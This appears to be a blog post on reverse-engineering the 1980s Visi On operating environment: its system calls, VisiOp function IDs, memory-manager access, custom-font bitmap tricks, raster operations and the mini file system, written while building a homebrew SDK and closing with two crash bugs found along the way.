All the code segments in VisiOn have a command jmp [es:0x0] at the address 0x9 .

When an application's function is called (be it main , an event handler, or a "magic pointer" call), the OS pushes 0x9 on the stack as the return address before jmp to the function's entry point.

When a function finishes its work and executes a ret command, the CPU gets the return address from the stack ( 0x9 ) and executes the command jmp [es:0x0] . This is a far jump, but where does it jump to? The answer is: the CPU reads a long pointer from es:0 (the beginning of the OS kernel data segment); then jumps to it. The code at this point will decide what is the next jmp destination. This technique is called "jumping into a trampoline ".

If you're writing your program in assembly (and you shouldn't be), then no one stops you from replacing ret at the end of your functions with:

add SP, 2
jmp [es:0x0]

You can avoid "returning to 0x9 ", but you still must jump into the trampoline. Fun!

# Talking to VisiHost

A major part of the reverse-engineering effort was focused on trying to understand the internals of two smallest applications available for the OS, the Tutorial app ("tutor") and the Convert To Calc app ("cvtcalc"). The Tutorial app is 6.3 kilobytes of machine code, but that's actually quite a lot: 3525 lines (about 80 A4 sheets) of disassembly.

# Leveraging magic breakpoints

One thing that really simplified the debugging was adding Bochs' "magic breakpoints" to the Tutor and CVTCalc apps. Magic breakpoints work like this: when the emulator encounters a useless instruction - xchg bx, bx - it treats it as a breakpoint. These breakpoints happen as if by "magic", without any need to simulate mouse click events or figure out segment relocation between the calls to the OS. The only downside: this command needs to be "squeezed in" into the existing machine code. Thankfully, some of the machine instructions in the Tutor app are NOP ("do nothing"), so I replaced a few of those with xchg bx, bx .

# System calls

Most operating systems provide "system calls", a set of library methods that can manage disks, RAM, and so on. Graphical operating systems often provide calls for creating windows, and even handling the mouse and keyboard. Visi On is no exception.

A standard way to make a system call on an IBM PC-compatible is to call a software interrupt . The operating system tells the CPU that it can handle a certain software interrupt; a program uses this interrupt to communicate with the OS; the OS can return control to the program when the system call is finished. This is how system calls work in MS-DOS, for example:

;; Print a character
mov DL, '!'     ; the character to print in the DL register
mov AH, 2       ; function number 2 in the AH register
int 0x21        ; MS-DOS system call

VisiOn registers multiple interrupt handlers; among those, three are commonly used: 0xc0 , 0xc1 and 0xc2 . The interrupts 0xc1 and 0xc2 are used for direct and indirect "magic pointer" function calls. 0xc0 is the system call interrupt; it is the interface to the VisiHost.

Designed with portability in mind, VisiHost accepts arguments to the system calls through the stack: different processors might have different registers, but VisiOn most definitely needs to have a stack to work. A VisiOn system call looks like this:

;; Get the Segment ID for own data segment
push process_id         ; put "process_id" variable on the stack
push 0x219              ; push the syscall number and the size of the arguments in bytes on the stack
int 0xc0                ; call VisiHost

I originally thought that 0x219 is the number of the syscall, but very quickly discovered that there are only ~0x70 syscall handlers, so the actual syscall number is simply 0x19 . It took a bit of trial, error, reading the disassembly of the kernel, and stepping through a call to understand that 0x02 is the number of the arguments passed to the syscall times two.

The reason for that is simple: the application's stack is stored in its own data segment. When the operating system takes control, it uses its own data segment with its own stack. To pass the parameters between the stacks, the OS copies all the syscall arguments from one stack to the other.

# Get_Process_ID and Get_Segment_ID

There aren't that many system calls that a regular application makes. Among those, the first two calls an application makes are 0x17 and 0x19 .

0x17 returns the process ID for the current application.

0x19 takes a process ID as an argument and returns the data segment ID for the application. A VisiOn application absolutely must know its own Data Segment ID. The Segment ID is passed to all the syscalls; for example, when the application asks the OS to print a string on the screen, it needs to pass around not only the offset to the string relative to a data segment, but also the Segment ID for this data segment.

These two are followed by a system call 0x18 - "get Application Manager data" - which I will describe later.

# Messages

A bare-bones application for VisiOn must:

  • create a window,
  • then create a menu,
  • then wait for a menu click,
  • and then destroy the menu and the window.

All of this is done with system calls 0x21 and 0x22 . How did I find this out? There was no silver bullet, I've been running the same code in the debugger over and over again, tweaking some parameters, commenting out some bits of code here and there, and eventually asking Atsuko to write a small assembly program following the specifications I provided to confirm the discoveries experimentally.

Originally, I thought that 0x21 was something like "create windows & menus" and 0x22 was "redraw the window and maybe wait for an event". But something didn't feel right. 0x21 is always called with a different structure as the argument: sometimes it defines a window, sometimes it defines a menu and the event handlers, and sometimes it destroys all the created UI elements. 0x22 always returns a value, and sometimes it makes the application go into the background.

So, my conclusion is: most likely, 0x21 is "send the message" and 0x22 is "receive the message (maybe wait for one)". I don't have many examples of "messages", but I managed to partially describe "create the window" and "wait for the events" structures.

These messages resemble Smalltalk, but they are relatively rare compared to other types of system calls. It makes me think that at some point VisiOn left behind its Smalltalk roots, and the "messages" subsystem might be just a remnant of the original design.

# Fake stack

"Create the menu and wait for an event" function does something wacky. The structure we pass to the syscall 0x21 accepts a pointer as one of the arguments. In the original VisiOn apps, it points to a structure created on a stack. For the sake of simplicity, we placed this structure in the data segment. Things worked until we added on-screen buttons; clicking a button would crash the system. Why? The operating system used this pointer to access data from both after and before the pointer. In other words, this is a pointer to the middle of a structure!

Why would anyone do that? No idea. This detail of the implementation likely didn't matter for programs written in Visi C, and most developers probably didn't even know about it.

# Reaching out to VisiMachine

The articles in the BYTE magazine tell us that if an application wants to draw on the screen, print a text, read a file from the disk, or define an on-screen button, it needs to do so through VisiMachine. Indeed, while VisiHost system calls can do a great many things, the applications I tried to reverse-engineer never called them directly. For example, there are syscalls 0x34 and 0x35 for drawing a bitmap on the screen and copying a bitmap from the screen, but these syscalls are only ever called from the Services app. Moreover, they're not "window-aware": with these calls, the application can draw on the screen outside of its own window!

So, if we want to be good citizens, we need to follow the standard call convention and reach out to the VisiMachine. But how?!

# Syscall 0x1e

The most common system call in any application is 0x1e . This call seemingly does almost anything, including but not limited to: reading data from files, printing text on the screen and creating on-screen buttons. Sounds like a "VisiOp" (VisiMachine) call, doesn't it?

Figuring out the VisiOp calls was really challenging. The number of arguments for the call is always different, and even the arguments themselves are different between different runs of the same program. This call is intense!

When a program starts , it asks the OS for the Application Manager data segment using syscall 0x18 . From this segment, the program copies into its own segment:

  • 12 "virtual device" IDs unique to the copy of the application,
  • 1 long (segment+offset) pointer to Application Manager,
  • 2 more "system" IDs, and then
  • 170 more "function" IDs.

If you're just looking at disassembly, this operation is simply copying 372 bytes (12 + 1 * 2 + 2 + 170 words) from one segment to the other.

When a program needs to call a VisiOp, the syscall 0x1e receives:

  • total number of arguments,
  • one of the "system" IDs,
  • one of the "function" IDs,
  • number of arguments minus 2 (e.g. not counting two IDs above)
  • one of the "virtual device" IDs,
  • one or more extra arguments, some of which might be the application's segment ID.

Additionally, the application sets a flag at the segment+offset of the Application Manager before this call, and clears it after the call.

# System IDs and Virtual Device IDs

My understanding of the Virtual Device IDs is limited and is based on the actions taken by the OS.

// VT = Virtual Terminal
#define DEVICE_VT 0x3
#define DEVICE_MEM 0x4
#define DEVICE_MENU 0xc

#define SYS_MESSAGE 0x0
#define SYS_CALL 0x1

The "Virtual Device" IDs are sort of similar to the list of "data types" from the article "The Visi On Operating Environment":

PROGRAM 
PROCESS 
MEMORY SEGMENT
PORT 
RASTER
DEVICE
FILE
BACKGROUND 
FONT
MOUSE
SOUNDMAKER 
KEYBOARD

But it couldn't be the same thing! Both "font management" (FONT) and "define clickable area" (MOUSE) are managed through the DEVICE_VT . Did the specification for the system change between this article and the OS release? No idea.

# Function IDs

Things get really interesting and confusing if you consider that the 0x1e system call requires a "function" ID to operate. For example, if you want to load a font, you need to look up the "function" ID 0x18 , and pass it along with the DEVICE_VT .

As you can imagine, it is impossible to load a font in a DEVICE_MEM , and it is impossible to read a file from DEVICE_VT . What is the point of using both device ID and function ID, then? I don't know. But considering that we pass the number of arguments twice, perhaps, there is no meaning to it. Perhaps, VisiOps were implemented by two different teams who couldn't agree on how to pass the arguments between the VisiHost and the VisiMachine.

The true nature of "function" IDs is "magic" pointers. The "function ID" for any VisiOp is simply an offset to a function in the "magic" pointers list for the Application Manager . There are over 600 "magic" pointers in the Application Manager (you can find the list in SEG10003.VOS at offset 0xa600 ), but only 170 of them are used as VisiOps.

# Direct access to the memory manager

While VisiOn has a VisiOp that can copy data between two segments by their Segment IDs, every now and then it can be useful to resolve the physical address for a given memory segment. This is most definitely not a cross-platform approach, but VisiOn applications use it when they want to peek inside the Application Manager's data segment.

The memory access dance is done this way:

  1. Assume ES = OS segment
  2. The table of segments in the memory manager begins at segID2seg = es:[[es:0x6]+[es:0x4]]
  3. The word at es:[segID2seg+segID] stores flags of the segment ID (swapped in/out, used for read/write)
  4. The word at es:[segID2seg+segID+2] stores the physical location of the segment in the RAM, if it is loaded

If the segment is not present in RAM (swapped out), it is possible to ask the OS to load it for you. I highly suspect syscall 0x05 is responsible for segment loading, but most apps are not using it. All the normally required memory segments are present in the RAM as if by "magic", anyways. The Pyramid game is using this call to ensure the font segment is in the RAM. Without this call, it might not load in time on a slow machine like an XT; this is probably related to the DMA disk operations initiated by the OS.

# Outstanding hackery of bitmap displays

It isn't too difficult to use VisiOn's Virtual Terminal Device for text output and on-screen buttons, but displaying graphics and custom fonts required a bit of trial and error. The reason, of course, is the lack of references: VisiOn only displays images on the splash screen of programs like Word and Calc!

# Custom fonts as a bitmap format

I think there must be a VisiOp function for displaying a bitmapped image. But, for some reason, when VisiOn Calc draws a splash screen, it uses something completely different: a custom font.

The bitmapped image is divided into glyphs, glyphs (1-127) are loaded as a font, and then the image on the screen is printed as if it was just a string. The Convert To Calc logo, printed with the default font, looks like this:

You can see that this method allows image compression: empty blocks are represented by spaces.

# Finding a Segment ID for a segment

The VisiOp "load font" loads a font from a Segment ID passed to it. This means an application must know how to find a (dynamically-assigned!) Segment ID for any of its segments. The code that resolves a Segment ID for a magic pointer 0x810 is so clever it made me flip my table:

mov ax, [cs:0x810+2]

Convert To Calc has multiple code and data segments. One of those segments has a table of "magic" pointers. The "magic" pointer at offset 0x810 is a "magic" pointer to the file with the font. So far, nothing out of the ordinary.

As I mentioned before, the operating system fills out the "magic" pointer table (list of entry points) with the Segment IDs when it starts an application. The Segment IDs are filled out "in place". The entry points list in the Tutorial app is stored in a segment that doesn't have any code in it.

But Convert To Calc has a couple of functions exported from the "entry points and magic pointers" segment. When a cross-segment call is made to such a function, the current list of magic pointers and Segment IDs is stored right in the same code segment . A "magic" pointer, simply being an offset from the beginning of the file, can be read with a simple mov :

mov ax, [cs:magic_pointer]   ;; entry point offset
mov ax, [cs:magic_pointer+2] ;; entry point Segment ID

So, mov ax, [cs:0x810+2] called from the code segment with the entry points table allows the program to know what Segment ID was assigned to the font segment.

# ROPs

Printing text through the VisiOn's virtual terminal in the graphical mode, for all intents and purposes, behaves like a proper Bit blit . One of the VisiOp parameters accepts a ROP code ("Raster OPeration").

VisiOn takes an interesting approach to ROPs and bitmap displaying. You might know that Windows supported ternary BitBLT with JIT-generated machine code for display rendering. VisiOn uses binary ROPs, similar to the ROPs in Xerox Alto or Bell Labs BLIT, and it also produces JIT machine code, but it produces the code for the "glyph space".

Among other things, VisiOn will break each character into bits when you load a font and then emit the machine code that will produce the required bits. Basically, if your font array was font[char_id][bit_num] , it will be converted into font_jit[bit_num][char_id] . I am not sure why; maybe there are some performance benefits to this approach.

If this sounds like an unnecessary headache, remember that bitmapped output on CGA is a headache already. The screen buffer in CGA is interlaced: odd and even lines are stored in separate memory blocks. The pixels on the screen are bit-packed, too. If you want to plot a pixel at coordinates (1,1), your program will need to:

  1. Understand if you're drawing a pixel on an even or on an odd line,
  2. Resolve the memory offset for the correct interlaced block,
  3. Divide the Y coordinate by 2, and the X coordinate by 8 to find the byte that stores the pixel,
  4. Read this byte from the video memory,
  5. Flip a single bit in this byte, corresponding to the pixel you want to set or reset,
  6. Write the byte back.

These calculations are expensive, so it only makes sense to make the video driver slightly more complicated but feature-rich. For example, if you're reading the pixel from RAM anyway, you can choose between ADD, OR, NOT, or XOR pixel operations for free.

There are 16 available ROPs in total. Here is a checkerboard background and a circle drawn on top of it with different ROPs:

# Mini-FS

Each application is shipped with something I call a "mini-file-system". The format of it is primitive: the number of entries, the list of pointers to the entries, and then the entries themselves. Each entry has a header similar to the "segment header" used by the installer, consisting of the magic number and the length of the entry.

The mini-FS, among other things, is used for the built-in help system. Entries to the mini-FS can be referenced from the menu system, so the OS could "magically" display the right entry when the user clicks "HELP".

Naturally, the application can read entries from the mini-FS with a simple VisiOp call.

# What's next?

This reverse-engineering project ended up being much bigger than I anticipated. We have a working application, yes, but so far I've documented less than 10% of all the VisiHost and VisiOp calls. We still don't know how to implement keyboard input, or how to work with timers and background processes (if it is possible).

Atsuko and I would like to continue working on this SDK, but considering our other projects, I cannot imagine it taking as much priority as it has so far. This may be as far as we get. But this is pretty far already. If one were to follow these notes, they should be able to discover and document new VisiOps, say, from Word or Graph, very fast.

# Bloopers

I discovered two funny bugs in the process of reverse-engineering.

# The window is too small!

If you've done any graphical programming for windowed environments, you would expect that the Create_Window() function requires window dimensions for a freshly-created window. VisiOn is free from such prejudice. As far as I can tell, applications are not supposed to freely decide what their window size should be. The Application Manager's option sheet has fields "window width" and "window height" that define the dimensions for most windows (except for the Application Manager, Help and Tutorial windows).

Naturally, the application can read the dimensions of its window so it can resize the contents inside. But if the window dimensions are too small, some of the applications would crash, and would take down the whole system:

# Let me BEEP

VisiOn loves to beep at the user. It beeps every time a menu option is chosen or an on-screen button is clicked.

If you are tired of the noise, you'd appreciate that Application Manager has an option to replace the sound with a "visual beep". It is implemented as a flashing area of 32x16 pixels around the mouse cursor. Every time the flashing is about to happen, an image "below" the cursor is preserved in RAM to be restored after the "visual beep" is over. However, the memory allocated for this bitmap is never freed. It takes between 200 and 1000 clicks to fill the RAM with useless copies of the mouse cursor, and then the system crashes.


# Thanks

Huge thanks to:

  • Atsuko Ito for moral support and for the actual Homebrew app implementation,
  • Tom Stepleton for proofreading and early feedback on this note,
  • Nathan Lineback for an extensive research into VisiOn, and for his software preservation efforts,
  • VisiOn developers,
  • you, the reader!